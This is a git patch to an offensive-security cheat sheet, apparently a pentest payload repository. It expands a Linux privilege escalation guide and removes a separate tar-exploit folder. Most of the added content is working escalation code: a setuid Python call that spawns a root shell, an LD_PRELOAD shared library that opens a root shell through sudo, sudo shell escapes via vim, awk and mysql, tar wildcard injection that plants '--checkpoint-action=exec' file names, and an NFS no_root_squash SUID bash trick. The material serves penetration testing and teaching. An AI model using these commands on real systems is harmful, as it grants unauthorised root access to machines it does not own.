From 68df152fd3359f7ced34774f6412de658fb39c37 Mon Sep 17 00:00:00 2001 From: Swissky Date: Thu, 7 Mar 2019 15:09:06 +0100 Subject: [PATCH] Linux PrivEsc - Wildcard/NFS/Sudo --- .../Linux - Privilege Escalation.md | 125 ++++++++++++++++-- .../Windows - Privilege Escalation.md | 1 + .../--checkpoint-action=exec=sh shell.sh | 0 Tar Commands Execution/Files/--checkpoint=1 | 0 Tar Commands Execution/Files/shell.sh | 3 - Tar Commands Execution/README.md | 19 --- 6 files changed, 116 insertions(+), 32 deletions(-) delete mode 100644 Tar Commands Execution/Files/--checkpoint-action=exec=sh shell.sh delete mode 100644 Tar Commands Execution/Files/--checkpoint=1 delete mode 100644 Tar Commands Execution/Files/shell.sh delete mode 100644 Tar Commands Execution/README.md diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index d9b271d..951844d 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -13,9 +13,20 @@ ## Summary * [Checklist](#checklist) +* [Cron job](#cron-job) * [SUID](#suid) + * [Find SUID binaries](#find-suid-binaries) + * [Create a SUID binary](#create-a-suid-binary) * [Capabilities](#capabilities) + * [List capabilities of binaries](#list-capabilities-of-binaries) + * [Edit capabilities](#edit-capabilities) + * [Interesting capabilities](#interesting-capabilities) * [SUDO](#sudo) + * [NOPASSWD](#nopasswd) + * [LD_PRELOAD and NOPASSWD](#ld-preload-and-passwd) + * [Doas](#doas) +* [GTFOBins](#gtfobins) +* [Wildcard](#wildcard) * [Groups](#groups) * [Docker](#docker) @@ -92,7 +103,28 @@ * Checks to see if the host has Docker installed * Checks to determine if we're in an LXC container +## Cron job +Check if you have access with write permission on these files. +Check inside the file, to find other paths with write permissions. + +```powershell +/etc/init.d +/etc/cron.d +/etc/cron.daily +/etc/cron.hourly +/etc/cron.monthly +/etc/cron.weekly +/etc/sudoers +/etc/exports +/etc/at.allow +/etc/at.deny +/etc/crontab +/etc/cron.allow +/etc/cron.deny +/etc/anacrontab +/var/spool/cron/crontabs/root +``` ## SUID @@ -122,10 +154,11 @@ sudo chmod +s /tmp/suid # setuid bit ## Capabilities -List capabilities of binaries +### List capabilities of binaries + ```bash ╭─swissky@crashmanjaro ~ -╰─$ getcap -r /usr/bin +╰─$ /usr/bin/getcap -r /usr/bin /usr/bin/fping = cap_net_raw+ep /usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep @@ -135,13 +168,14 @@ List capabilities of binaries /usr/bin/rcp = cap_net_bind_service+ep ``` -Edit capabilities +### Edit capabilities + ```powershell -/sbin/setcap -r /bin/ping # remove -setcap cap_net_raw+p /bin/ping # add +/usr/bin/setcap -r /bin/ping # remove +/usr/bin/setcap cap_net_raw+p /bin/ping # add ``` -Interesting capabilities +### Interesting capabilities ```powershell cap_dac_read_search # read anything @@ -151,15 +185,18 @@ cap_setuid+ep # setuid Example of privilege escalation with `cap_setuid+ep` ```powershell -$ sudo setcap cap_setuid+ep /usr/bin/python2.7 +$ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7 $ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")' sh-5.0# id uid=0(root) gid=1000(swissky) ``` + ## SUDO +### NOPASSWD + Sudo configuration might allow a user to execute some command with another user privileges without knowing the password. ```bash @@ -176,13 +213,39 @@ sudo vim -c '!sh' sudo -u root vim -c '!sh' ``` +### LD_PRELOAD and NOPASSWD + +If `LD_PRELOAD` is explicitly defined in the sudoers file + +```powershell +Defaults env_keep += LD_PRELOAD +``` + +Compile the following C code with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles` + +```powershell +#include +#include +#include +void _init() { + unsetenv("LD_PRELOAD"); + setgid(0); + setuid(0); + system("/bin/sh"); +} +``` + +Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD=/tmp/shell.so find` + +### Doas + There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf` ```bash permit nopass demo as root cmd vim ``` -### GTFOBins +## GTFOBins [GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. @@ -190,7 +253,45 @@ The project collects legitimate functions of Unix binaries that can be abused to > gdb -nx -ex '!sh' -ex quit > sudo mysql -e '\! /bin/sh' -> strace -o /dev/null /bin/sh +> strace -o /dev/null /bin/sh +> sudo awk 'BEGIN {system("/bin/sh")}' + + +## Wildcard + +By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy. + +```powershell +# create file for exploitation +touch -- "--checkpoint=1" +touch -- "--checkpoint-action=exec=sh shell.sh" +echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh + +# vulnerable script +tar cf archive.tar * +``` + +Tool: [wildpwn](https://github.com/localh0t/wildpwn) + + +## NFS Root Squashing + +When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it + +```powershell +# create dir +mkdir /tmp/nfsdir + +# mount directory +mount -t nfs 10.10.10.10:/shared /tmp/nfsdir +cd /tmp/nfsdir + +# copy wanted shell +cp /bin/bash . + +# set suid permission +chmod +s bash +``` ## Groups @@ -230,4 +331,8 @@ uid=0(root) gid=0(root) groups=0(root) - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) - [Privilege escalation via Docker - April 22, 2015 — Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html) -- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/) \ No newline at end of file +- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/) +- [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) +- [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/) +- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) +- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? - APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 05f2d34..e0d6f94 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -27,6 +27,7 @@ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt ``` - [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) +- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated. ](https://github.com/abatchy17/WindowsExploits) - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) - [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) ```powershell diff --git a/Tar Commands Execution/Files/--checkpoint-action=exec=sh shell.sh b/Tar Commands Execution/Files/--checkpoint-action=exec=sh shell.sh deleted file mode 100644 index e69de29..0000000 diff --git a/Tar Commands Execution/Files/--checkpoint=1 b/Tar Commands Execution/Files/--checkpoint=1 deleted file mode 100644 index e69de29..0000000 diff --git a/Tar Commands Execution/Files/shell.sh b/Tar Commands Execution/Files/shell.sh deleted file mode 100644 index 8473b30..0000000 --- a/Tar Commands Execution/Files/shell.sh +++ /dev/null @@ -1,3 +0,0 @@ -#!/bin/bash -cat /passwd > /tmp/flag -chmod 777 /tmp/flag \ No newline at end of file diff --git a/Tar Commands Execution/README.md b/Tar Commands Execution/README.md deleted file mode 100644 index 5b40859..0000000 --- a/Tar Commands Execution/README.md +++ /dev/null @@ -1,19 +0,0 @@ -# TAR Command Execution - -By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy. - -## Exploit - -These files work against a "tar *" - -```powershell ---checkpoint=1 ---checkpoint-action=exec=sh shell.sh -shell.sh (your exploit code is here) -``` - -## References - -* [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) -* [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/) -* [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) \ No newline at end of file